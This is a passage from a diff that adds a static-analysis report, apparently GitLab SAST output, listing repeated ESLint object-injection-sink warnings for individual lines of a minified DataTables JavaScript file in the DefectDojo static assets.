"eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 123, + "end_line": 123, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 129, + "end_line": 129, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 130, + "end_line": 130, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 131, + "end_line": 131, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 133, + "end_line": 133, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 134, + "end_line": 134, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 135, + "end_line": 135, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 136, + "end_line": 136, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 137, + "end_line": 137, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 138, + "end_line": 138, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 139, + "end_line": 139, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 140, + "end_line": 140, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 142, + "end_line": 142, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 143, + "end_line": 143, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 144, + "end_line": 144, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 147, + "end_line": 147, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 148, + "end_line": 148, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 149, + "end_line": 149, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 150, + "end_line": 150, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Variable Assigned to Object Injection Sink", + "message": "Variable Assigned to Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 151, + "end_line": 151, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 152, + "end_line": 152, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 153, + "end_line": 153, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 154, + "end_line": 154, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 155, + "end_line": 155, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 158, + "end_line": 158, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 159, + "end_line": 159, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 161, + "end_line": 161, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 163, + "end_line": 163, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 164, + "end_line": 164, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 165, + "end_line": 165, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 167, + "end_line": 167, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 168, + "end_line": 168, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 169, + "end_line": 169, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 172, + "end_line": 172, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 173, + "end_line": 173, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 174, + "end_line": 174, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Generic Object Injection Sink", + "message": "Generic Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": "dojo/static/dojo/js/datatables.min.js:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855:security/detect-object-injection", + "severity": "Unknown", + "confidence": "Unknown", + "scanner": { + "id": "eslint", + "name": "ESLint" + }, + "location": { + "file": "dojo/static/dojo/js/datatables.min.js", + "start_line": 176, + "end_line": 176, + "dependency": { + "package": {} + } + }, + "identifiers": [ + { + "type": "eslint_rule_id", + "name": "ESLint rule ID security/detect-object-injection", + "value": "security/detect-object-injection", + "url": "https://github.com/nodesecurity/eslint-plugin-security#detect-object-injection" + } + ] + }, + { + "category": "sast", + "name": "Function Call Object Injection Sink", + "message": "Function Call Object Injection Sink", + "description": "Bracket object notation with user input is present, this might allow an attacker to access all properties of the object and even it's prototype, leading to possible code execution.", + "cve": 